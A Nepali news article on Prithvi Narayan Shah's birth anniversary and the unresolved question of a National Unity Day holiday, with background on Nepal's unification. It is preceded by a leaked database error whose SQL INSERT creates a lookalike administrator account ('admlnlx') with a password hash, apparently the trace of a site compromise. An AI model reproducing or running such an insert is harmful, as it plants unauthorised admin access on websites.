WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bx7lKvIV9oduwNQNR0QgpScTns1hem0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 04:46:03', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस २७ –
बुधबार पुस २७ गते, नेपाल एकीकरण गर्ने तत्कालिन राजा पृथ्वीनारायण शाहको जन्म जयन्ती । सरकारी स्तरबाट पृथ्वी जयन्तीको कुनै कार्यक्रम नभएपनि विभिन्न राजनीतिक दल तथा निजी क्षेत्रको पहलमा पृथ्वी जयन्ती तथा राष्ट्रिय एकता दिवस मनाईंदैछ ।
विक्रम संवत २००७ सालपछि देशमा राष्ट्रिय एकता दिवस मनाउन थालिए पनि २०६२÷०६३ सालको जनआन्दोलनपछि सरकारी स्तरबाट राष्ट्रिय एकता दिवसलाई खारेज गरिएको हो । केही वर्षदेखि पुस २७ लाई राष्ट्रिय एकता दिवसको रुपमा मनाउनुपर्ने आवाज उठेपनि सरकारले निर्णय गर्न सकेको छैन ।
बुधबार सार्वजनिक बिदा दिने विषयमा मन्त्रिपरिषदमा समेत छलफल भएपनि प्रधानमन्त्री पुष्पकमल दाहालले यो राजनीतिक विषय भएकाले सबैको सहमति चाहिने बताएपछि बिदा दिन नसकिएको हो ।
पृथ्वीनारायणको शासनकालमा नेपाल ५४ टुक्रामा विभाजित थियो । जसमध्ये बाइसे कर्णाली र चौविसे राज्य गण्डकी प्रदेशमा थिए । लिच्छवीकालमा पनि नेपाल अहिलेकै जस्तो ठूलो रहेको इतिहासमा पाइन्छ ।
पश्चिमा खस राज्य थियो । उनीहरु २२ टुक्रामा विभाजित थिए । त्यसपछि पाल्पाली राजा मुुकुन्दसेन सिमरौनगढका ढोय जातिलाई लिएर काठमाडौं पस्न खोजेका थिए तर सकेनन् ।
अर्का मल्लकालीन राजा जयस्थिति मल्लले पनि एकीकरणको प्रयास गरेका थिए, तर सफल भएनन् । पछि यक्ष मल्लले एकीकरण गर्न सुरु गरे उनका छोरा बुहारीका पालाका नेपालमण्डल तीन टुक्रा काठमाडौं, ललितपुर र भक्तपुर भयो ।
यसरी टुक्राटुक्रामा विभक्त नेपाललाई पृथ्वीनारायण शाह गोरखाबाट पूर्वतर्फ अघि बढेर एकीकरणको अभियान सुरु गर्नुभएको थियो ।
एकीकरण अभियानसँगै पृथ्वीनारायण शाहको दिव्योपदेशलाई सबैले स्मरण गर्छन् । उहाँको दिव्योपदेश आधुनिक नेपालका लागि उत्तिकै सान्दर्भिक र प्रेरणादायी छ ।